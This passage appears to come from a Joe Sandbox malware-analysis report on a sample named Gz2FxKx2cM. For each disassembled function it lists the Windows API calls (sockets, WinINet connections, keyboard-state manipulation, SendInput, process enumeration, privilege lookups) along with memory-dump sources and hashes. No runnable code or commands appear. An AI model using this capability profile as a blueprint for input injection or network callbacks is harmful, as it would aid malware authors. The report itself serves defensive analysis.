                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$__itow
                                          • String ID:
                                          • API String ID: 3379773720-0
                                          • Opcode ID: 02fd2df720bc417cc1df33fb2f1715cfd7d9c28f408597301224e0b48f995e08
                                          • Instruction ID: e80ec4e7271f647d5631e8ed8aecb1c083bcb9a25cf39e5066954353314cfec1
                                          • Opcode Fuzzy Hash: 02fd2df720bc417cc1df33fb2f1715cfd7d9c28f408597301224e0b48f995e08
                                          • Instruction Fuzzy Hash: D9417074A00218AFEF11EF55D845BEEBBB9EF84725F000069FD05A7291DB74AE48CB61
                                          Function 009769AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 009769D1
                                          • WSAGetLastError.WSOCK32(00000000), ref: 009769E1
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00976A45
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00976A51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ErrorLast$__itow__swprintfsocket
                                          • String ID:
                                          • API String ID: 2214342067-0
                                          • Opcode ID: f9252f1df48444b53f797d05187efff02e50febb343e8e70aed735c548922601
                                          • Instruction ID: 0fd38d162f1b37570fd1194635e7ea10a482c5659e9b05bd20428b4a98b6fc44
                                          • Opcode Fuzzy Hash: f9252f1df48444b53f797d05187efff02e50febb343e8e70aed735c548922601
                                          • Instruction Fuzzy Hash: A941BF75740600AFEB64AF24CC86F3A77A89F84B14F04C558FA59AF3C3DA709D008B91
                                          Function 0097641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                          Download Yara Rule
                                          APIs
                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0098F910), ref: 009764A7
                                          • _strlen.LIBCMT ref: 009764D9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID:
                                          • API String ID: 4218353326-0
                                          • Opcode ID: aaa6555446a677a21add5ae8e0f9f1a5d274039494538add32c488f46f9d3e79
                                          • Instruction ID: ed7bafa540fa376c1d28d262f422c207dc782b361bc5a022c6ca2fcdb71ec1ab
                                          • Opcode Fuzzy Hash: aaa6555446a677a21add5ae8e0f9f1a5d274039494538add32c488f46f9d3e79
                                          • Instruction Fuzzy Hash: E7418272A00504AFCB14EBA8EC95FBEB7A9AF84310F14C155F9199B2D3EB30AD44DB50
                                          Function 0096B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0096B89E
                                          • GetLastError.KERNEL32(?,00000000), ref: 0096B8C4
                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0096B8E9
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0096B915
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                          • String ID:
                                          • API String ID: 3321077145-0
                                          • Opcode ID: aae8c1356f1c58b94fdf2840502d65a837866c0c26e969afb9f31da97445e234
                                          • Instruction ID: 05579358b09a30819a42ac7fd4616308133abfda9b8e62650170f06a447fb0e8
                                          • Opcode Fuzzy Hash: aae8c1356f1c58b94fdf2840502d65a837866c0c26e969afb9f31da97445e234
                                          • Instruction Fuzzy Hash: 25412539600610DFCB11EF15C484A59BBE5EF8A324F09C098EC4AAB3A2CB30FD41DB91
                                          Function 00988851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                          Download Yara Rule
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009888DE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          • Opcode ID: 6da6b6c795bb79a213bfca2444d26e0bcf2317580cf776398bf147e43ee2d34c
                                          • Instruction ID: c632ab3aff918fe1adf1f8700375f23998f6c2ccf6f43e7e5688b90267c526db
                                          • Opcode Fuzzy Hash: 6da6b6c795bb79a213bfca2444d26e0bcf2317580cf776398bf147e43ee2d34c
                                          • Instruction Fuzzy Hash: 7C31F434614109AFEB20BB18CC45FBA77A8EB09350FD44511F921E63E1CE32E9809762
                                          Function 0098AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 0098AB60
                                          • GetWindowRect.USER32(?,?), ref: 0098ABD6
                                          • PtInRect.USER32(?,?,0098C014), ref: 0098ABE6
                                          • MessageBeep.USER32(00000000), ref: 0098AC57
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Rect$BeepClientMessageScreenWindow
                                          • String ID:
                                          • API String ID: 1352109105-0
                                          • Opcode ID: d88e758a783a5405c5d0655a0cbe903cc41f2be36420a3e1b845ec9e0c19f196
                                          • Instruction ID: 1d0c8b2779336eaff1aaac0836474cd9c33ff3af59bb9f1259de34a3c77e1f07
                                          • Opcode Fuzzy Hash: d88e758a783a5405c5d0655a0cbe903cc41f2be36420a3e1b845ec9e0c19f196
                                          • Instruction Fuzzy Hash: 6D418D30A04119DFEB11EF58C884B697BF5FF49310F1885AAE895DB361D730E841DB92
                                          Function 00960AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00960B27
                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00960B43
                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00960BA9
                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00960BFB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: e37ca539edc888318ddce659c30dd836799f2fa116db0095270366b3a9dedd03
                                          • Instruction ID: 4f7ed5593f94d1416abd1312ccc19d796ba58fa7308a8301ddedce8bab66e71a
                                          • Opcode Fuzzy Hash: e37ca539edc888318ddce659c30dd836799f2fa116db0095270366b3a9dedd03
                                          • Instruction Fuzzy Hash: B5310730944218AEFF308A39CC55BFFBBA9ABC5329F08826AF491521D1C77989549751
                                          Function 00960C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00960C66
                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00960C82
                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00960CE1
                                          • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00960D33
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: 501f7114a31e35453dc269fff7fd11d19565eb9b7fce372e78d510446a26cb4f
                                          • Instruction ID: 683c0ba4bd4250c0262810d4376788cb121e5934701754d74227ede76b3fd57f
                                          • Opcode Fuzzy Hash: 501f7114a31e35453dc269fff7fd11d19565eb9b7fce372e78d510446a26cb4f
                                          • Instruction Fuzzy Hash: 2B3135309403086EFF348B65C864BBFBB6AEBC5320F04471AE4C1521D1C3399955D751
                                          Function 009361C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009361FB
                                          • __isleadbyte_l.LIBCMT ref: 00936229
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00936257
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0093628D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: 069e14e4251770006e783fbdb259edf4b78dce1dc27e0a4b2efe6b95e4df9213
                                          • Instruction ID: 892b44e991b5753919710ffaa460e47800b8781a51e646d9b23a12500fb80049
                                          • Opcode Fuzzy Hash: 069e14e4251770006e783fbdb259edf4b78dce1dc27e0a4b2efe6b95e4df9213
                                          • Instruction Fuzzy Hash: 8A31A031604256BFDF218F65CC48BAB7BB9FF42310F168529E864D7191DB31D950DB90
                                          Function 00984EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 00984F02
                                            • Part of subcall function 00963641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0096365B
                                            • Part of subcall function 00963641: GetCurrentThreadId.KERNEL32 ref: 00963662
                                            • Part of subcall function 00963641: AttachThreadInput.USER32(00000000,?,00965005), ref: 00963669
                                          • GetCaretPos.USER32(?), ref: 00984F13
                                          • ClientToScreen.USER32(00000000,?), ref: 00984F4E
                                          • GetForegroundWindow.USER32 ref: 00984F54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                          • String ID:
                                          • API String ID: 2759813231-0
                                          • Opcode ID: 377a4172b206e74f23dfd7214afe1e9d4264016487ad12d7ff9b70236b5547c0
                                          • Instruction ID: cf6092485dfd4c61d8101fd59bd9e7705e703eaca6e6d996e2ffa790e2a844bf
                                          • Opcode Fuzzy Hash: 377a4172b206e74f23dfd7214afe1e9d4264016487ad12d7ff9b70236b5547c0
                                          • Instruction Fuzzy Hash: 7E310F71E00108AFDB00EFB5C885AEFB7F9EF94300F10846AE955E7242DA759E05CBA1
                                          Function 00963C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00963C7A
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00963C88
                                          • Process32NextW.KERNEL32(00000000,?), ref: 00963CA8
                                          • CloseHandle.KERNEL32(00000000), ref: 00963D52
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: 0a4d5365b9551a9a6aa44c0f4f2e5d2828d64217f0d17ab0d330f1235f88320a
                                          • Instruction ID: e415064407fe76a933ee2f5101ba87b8afba52f9884b55ca55dabfd8e3caf4b5
                                          • Opcode Fuzzy Hash: 0a4d5365b9551a9a6aa44c0f4f2e5d2828d64217f0d17ab0d330f1235f88320a
                                          • Instruction Fuzzy Hash: D9319C711083059FD300EF60D895BAFBBE8EFD5354F50082DF592862E1EB71AA49CB92
                                          Function 0098C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00902612: GetWindowLongW.USER32(?,000000EB), ref: 00902623
                                          • GetCursorPos.USER32(?), ref: 0098C4D2
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0093B9AB,?,?,?,?,?), ref: 0098C4E7
                                          • GetCursorPos.USER32(?), ref: 0098C534
                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0093B9AB,?,?,?), ref: 0098C56E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                          • String ID:
                                          • API String ID: 2864067406-0
                                          • Opcode ID: 8359fd8b0a7b19871726597dc136ce3269099561d8a7e2b421d547524d53561b
                                          • Instruction ID: 78c6f43f28641e0fb711b6b249e81acfed8fa4234dc19ca8c1e7cd1305029283
                                          • Opcode Fuzzy Hash: 8359fd8b0a7b19871726597dc136ce3269099561d8a7e2b421d547524d53561b
                                          • Instruction Fuzzy Hash: 5131A075614018AFCF25DF58C868EFA7BB9EB49310F044069F9058B3A1C735BD90EBA4
                                          Function 00958656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0095810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00958121
                                            • Part of subcall function 0095810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0095812B
                                            • Part of subcall function 0095810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0095813A
                                            • Part of subcall function 0095810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00958141
                                            • Part of subcall function 0095810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00958157
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009586A3
                                          • _memcmp.LIBCMT ref: 009586C6
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009586FC
                                          • HeapFree.KERNEL32(00000000), ref: 00958703
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                          • String ID:
                                          • API String ID: 1592001646-0
                                          • Opcode ID: a5292058a513748da9dfd3a0d2aeae5297bce23d5055769527eddfa4525b550d
                                          • Instruction ID: a0d8b4c04ff0b93bb30780c83681d917c3656e5197c24567ac628da3385821fb
                                          • Opcode Fuzzy Hash: a5292058a513748da9dfd3a0d2aeae5297bce23d5055769527eddfa4525b550d
                                          • Instruction Fuzzy Hash: 23217A71E06109EFDB10DFA5C989BEEB7B8EF44306F154059E844BB240DB30AE09DB90
                                          Function 0092098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                          Download Yara Rule
                                          APIs
                                          • __setmode.LIBCMT ref: 009209AE
                                            • Part of subcall function 00905A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00967896,?,?,00000000), ref: 00905A2C
                                            • Part of subcall function 00905A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00967896,?,?,00000000,?,?), ref: 00905A50
                                          • _fprintf.LIBCMT ref: 009209E5
                                          • OutputDebugStringW.KERNEL32(?), ref: 00955DBB
                                            • Part of subcall function 00924AAA: _flsall.LIBCMT ref: 00924AC3
                                          • __setmode.LIBCMT ref: 00920A1A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                          • String ID:
                                          • API String ID: 521402451-0
                                          • Opcode ID: dd4fca5c29d2015bcb4e02655ca82bb4aede466a5b219bc2381c676b5a23fb02
                                          • Instruction ID: d830cf6003ffd303c28aded76edfdf484ed809920fa03a88e72e55b884fc4eec
                                          • Opcode Fuzzy Hash: dd4fca5c29d2015bcb4e02655ca82bb4aede466a5b219bc2381c676b5a23fb02
                                          • Instruction Fuzzy Hash: 2A113672A042146FDB04B7B4BC4AFBEB7AC9FC1320F644125F105572C3EE20584697A1
                                          Function 00971767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009717A3
                                            • Part of subcall function 0097182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0097184C
                                            • Part of subcall function 0097182D: InternetCloseHandle.WININET(00000000), ref: 009718E9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Internet$CloseConnectHandleOpen
                                          • String ID:
                                          • API String ID: 1463438336-0
                                          • Opcode ID: c3e48cb5985c6920389980d32b29639ed93f1ff72eede7649703d0aa04a8040a
                                          • Instruction ID: 1ff2fbd66482991fb2a17fd10f38bd5f1e123aba62eb17132bc11a46ee803acb
                                          • Opcode Fuzzy Hash: c3e48cb5985c6920389980d32b29639ed93f1ff72eede7649703d0aa04a8040a
                                          • Instruction Fuzzy Hash: BA21F333214601BFEB169F64CC01FBABBADFF88710F10842EFA1996650DB71D810A7A1
                                          Function 00963A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,0098FAC0), ref: 00963A64
                                          • GetLastError.KERNEL32 ref: 00963A73
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00963A82
                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0098FAC0), ref: 00963ADF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                          • String ID:
                                          • API String ID: 2267087916-0
                                          • Opcode ID: 07408049165096b67f0aff23a9c6c02fec643adfb5666c96abbd4d162f2c8903
                                          • Instruction ID: b6dd00e0801be391b9b5b762cde765df08345a45db55c680653f0ded21b4c066
